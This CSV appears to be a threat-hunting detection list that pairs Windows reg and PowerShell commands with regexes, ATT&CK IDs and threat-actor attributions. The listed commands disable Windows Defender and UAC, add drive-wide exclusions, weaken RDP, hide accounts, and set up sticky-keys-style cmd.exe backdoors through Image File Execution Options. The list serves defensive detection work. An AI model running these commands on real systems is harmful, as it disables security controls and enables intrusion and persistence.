"*powershell.exe -nop -c Add-MpPreference -ExclusionPath ""C:\""*",".{0,1000}powershell\.exe\s\-nop\s\-c\sAdd\-MpPreference\s\-ExclusionPath\s\""C\:\\\"".{0,1000}","greyware_tool_keyword","reg","add entire disks exclusions to Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*powershell.exe -nop -c Add-MpPreference -ExclusionPath ""D:\""*",".{0,1000}powershell\.exe\s\-nop\s\-c\sAdd\-MpPreference\s\-ExclusionPath\s\""D\:\\\"".{0,1000}","greyware_tool_keyword","reg","add entire disks exclusions to Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*powershell.exe -nop -c Add-MpPreference -ExclusionPath ""E:\""*",".{0,1000}powershell\.exe\s\-nop\s\-c\sAdd\-MpPreference\s\-ExclusionPath\s\""E\:\\\"".{0,1000}","greyware_tool_keyword","reg","add entire disks exclusions to Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*powershell.exe -nop -c Add-MpPreference -ExclusionPath ""F:\""*",".{0,1000}powershell\.exe\s\-nop\s\-c\sAdd\-MpPreference\s\-ExclusionPath\s\""F\:\\\"".{0,1000}","greyware_tool_keyword","reg","add entire disks exclusions to Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Real-Time Protection"" /v ""DisableBehaviorMonitoring"" /t REG_DWORD /d ""1"" /f*",".{0,1000}Real\-Time\sProtection\""\s\/v\s\""DisableBehaviorMonitoring\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers""*",".{0,1000}reg\sadd\s\""HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal\sServer\sClient\\Servers\"".{0,1000}","greyware_tool_keyword","reg","could be used to manipulate system behavior or remove evidence","T1112 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/xiaoy-sec/Pentest_Note/blob/52156f816f0c2497c25343c2e872130193acca80/wiki/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/Windows%E6%8F%90%E6%9D%83/RDP%26Firewall/%E5%88%A0%E9%99%A4%E7%97%95%E8%BF%B9.md?plain=1#L4","1","0","N/A","N/A","10","10","3635","918","2023-05-22T03:50:57Z","2020-06-15T02:58:36Z"
"*REG ADD ""HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services"" /f /v fAllowUnsolicited /t REG_DWORD /d ""00000001""*",".{0,1000}REG\sADD\s\""HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Terminal\sServices\""\s\/f\s\/v\sfAllowUnsolicited\s\/t\sREG_DWORD\s\/d\s\""00000001\"".{0,1000}","greyware_tool_keyword","reg","making Remote Desktop Protocol (RDP) more vulnerable to unauthorized access.","T1021 - T1112","TA0008","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L19","1","0","N/A","N/A","8","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services"" /f /v fDenyTSConnections /t REG_DWORD /d ""00000000""*",".{0,1000}REG\sADD\s\""HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Terminal\sServices\""\s\/f\s\/v\sfDenyTSConnections\s\/t\sREG_DWORD\s\/d\s\""00000000\"".{0,1000}","greyware_tool_keyword","reg","making Remote Desktop Protocol (RDP) more vulnerable to unauthorized access.","T1021 - T1112","TA0008","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L19","1","0","N/A","N/A","8","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services"" /f /v UserAuthentication /t REG_DWORD /d ""00000000""*",".{0,1000}REG\sADD\s\""HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Terminal\sServices\""\s\/f\s\/v\sUserAuthentication\s\/t\sREG_DWORD\s\/d\s\""00000000\"".{0,1000}","greyware_tool_keyword","reg","making Remote Desktop Protocol (RDP) more vulnerable to unauthorized access.","T1021 - T1112","TA0008","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L19","1","0","N/A","N/A","8","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"" /f /v SecurityLayer /t REG_DWORD /d ""00000001""*",".{0,1000}REG\sADD\s\""HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal\sServer\\WinStations\\RDP\-Tcp\""\s\/f\s\/v\sSecurityLayer\s\/t\sREG_DWORD\s\/d\s\""00000001\"".{0,1000}","greyware_tool_keyword","reg","making Remote Desktop Protocol (RDP) more vulnerable to unauthorized access.","T1021 - T1112","TA0008","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L19","1","0","N/A","N/A","8","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications"" /v DisableNotifications /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sDefender\sSecurity\sCenter\\Notifications\""\s\/v\sDisableNotifications\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable security notifications / adjust User Account Control (UAC) settings / reduce security prompts for administrative actions","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*reg add ""HKLM\Software\Microsoft\Windows Defender"" /v DisableAntiSpyware and DisableAntiVirus /t REG_DWORD /d ""1"" /f*",".{0,1000}reg\sadd\s\""HKLM\\Software\\Microsoft\\Windows\sDefender\""\s\/v\sDisableAntiSpyware\sand\sDisableAntiVirus\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender-related services","T1562.001","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe"" /f /v Debugger /t REG_SZ /d ""%windir%\system32\cmd.exe""*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\HelpPane\.exe\""\s\/f\s\/v\sDebugger\s\/t\sREG_SZ\s\/d\s\""\%windir\%\\system32\\cmd\.exe\"".{0,1000}","greyware_tool_keyword","reg","modify the Image File Execution Options to substitute accessibility tools with cmd.exe enabling privilege escalation by launching an elevated command prompt","T1546.012 - T1112","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L12","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe"" /f /v Debugger /t REG_SZ /d ""%windir%\system32\cmd.exe""*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\Magnify\.exe\""\s\/f\s\/v\sDebugger\s\/t\sREG_SZ\s\/d\s\""\%windir\%\\system32\\cmd\.exe\"".{0,1000}","greyware_tool_keyword","reg","modify the Image File Execution Options to substitute accessibility tools with cmd.exe enabling privilege escalation by launching an elevated command prompt","T1546.012 - T1112","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L12","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /f /v Debugger /t REG_SZ /d ""%windir%\system32\cmd.exe""*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe\""\s\/f\s\/v\sDebugger\s\/t\sREG_SZ\s\/d\s\""\%windir\%\\system32\\cmd\.exe\"".{0,1000}","greyware_tool_keyword","reg","modify the Image File Execution Options to substitute accessibility tools with cmd.exe enabling privilege escalation by launching an elevated command prompt","T1546.012 - T1112","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L12","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"" /f /v Debugger /t REG_SZ /d ""%windir%\system32\cmd.exe""*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\utilman\.exe\""\s\/f\s\/v\sDebugger\s\/t\sREG_SZ\s\/d\s\""\%windir\%\\system32\\cmd\.exe\"".{0,1000}","greyware_tool_keyword","reg","modify the Image File Execution Options to substitute accessibility tools with cmd.exe enabling privilege escalation by launching an elevated command prompt","T1546.012 - T1059.003 - T1055.001 - T1112","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L12","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*reg add ""HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist"" /v * /t REG_DWORD /d 0*",".{0,1000}reg\sadd\s\""HKLM\\Software\\Microsoft\\Windows\sNT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\""\s\/v\s.{0,1000}\s\/t\sREG_DWORD\s\/d\s0.{0,1000}","greyware_tool_keyword","reg","hiding a user from the login screen by modifying a specific registry key","T1112 - T1564.001","TA0005 - TA0003","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*REG ADD ""hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""ConsentPromptBehaviorAdmin"" /t REG_Dword /d 00000000 /f*",".{0,1000}REG\sADD\s\""hklm\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\""\s\/v\s\""ConsentPromptBehaviorAdmin\""\s\/t\sREG_Dword\s\/d\s00000000\s\/f.{0,1000}","greyware_tool_keyword","reg","disables the UAC consent prompt for administrators","T1112","TA0004","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Privilege Escalation","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\""\s\/v\sConsentPromptBehaviorAdmin\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","disable security notifications / adjust User Account Control (UAC) settings / reduce security prompts for administrative actions","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*reg add ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\""\s\/v\sConsentPromptBehaviorAdmin\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","disables the consent prompt for administrators","T1112","TA0004","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Privilege Escalation","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v EnableLUA /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\""\s\/v\sEnableLUA\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable security notifications / adjust User Account Control (UAC) settings / reduce security prompts for administrative actions","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v PromptOnSecureDesktop /t REG_DWORD /d 0 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\""\s\/v\sPromptOnSecureDesktop\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","disable security notifications / adjust User Account Control (UAC) settings / reduce security prompts for administrative actions","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*reg add ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v PromptOnSecureDesktop /t REG_DWORD /d 0 /f*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\""\s\/v\sPromptOnSecureDesktop\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","disables the secure desktop for User Account Control (UAC) prompts","T1112","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Privilege Escalation","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"" /v AllowFastServiceStartup /t REG_DWORD /d 0 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\""\s\/v\sAllowFastServiceStartup\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender - prevent it from starting quickly and prevent services from staying alive","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"" /v DisableAntiSpyware /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\""\s\/v\sDisableAntiSpyware\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender - prevent it from starting quickly and prevent services from staying alive","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"" /v ServiceKeepAlive /t REG_DWORD /d 0 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\""\s\/v\sServiceKeepAlive\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender - prevent it from starting quickly and prevent services from staying alive","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\Real\-Time\sProtection\""\s\/v\sDisableBehaviorMonitoring\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable real-time protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableIOAVProtection /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\Real\-Time\sProtection\""\s\/v\sDisableIOAVProtection\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable real-time protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\Real\-Time\sProtection\""\s\/v\sDisableOnAccessProtection\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable real-time protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\Real\-Time\sProtection\""\s\/v\sDisableRealtimeMonitoring\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable real-time protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\Real\-Time\sProtection\""\s\/v\sDisableScanOnRealtimeEnable\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable real-time protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\Reporting"" /v ""DisableEnhancedNotifications"" /t REG_DWORD /d ""1"" /f*",".{0,1000}reg\sadd\s\""HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender\\Reporting\""\s\/v\s\""DisableEnhancedNotifications\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet"" /v ""SpyNetReporting"" /t REG_DWORD /d ""0"" /f*",".{0,1000}reg\sadd\s\""HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender\\SpyNet\""\s\/v\s\""SpyNetReporting\""\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet"" /v ""SubmitSamplesConsent"" /t REG_DWORD /d ""0"" /f*",".{0,1000}reg\sadd\s\""HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender\\SpyNet\""\s\/v\s\""SubmitSamplesConsent\""\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet"" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\SpyNet\""\s\/v\sDisableBlockAtFirstSeen\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","reduce Windows Defender's ability to block suspicious files and prevent sample submissions to Microsoft","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet"" /v LocalSettingOverrideSpyNetReporting /t REG_DWORD /d 0 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\SpyNet\""\s\/v\sLocalSettingOverrideSpyNetReporting\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","reduce Windows Defender's ability to block suspicious files and prevent sample submissions to Microsoft","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
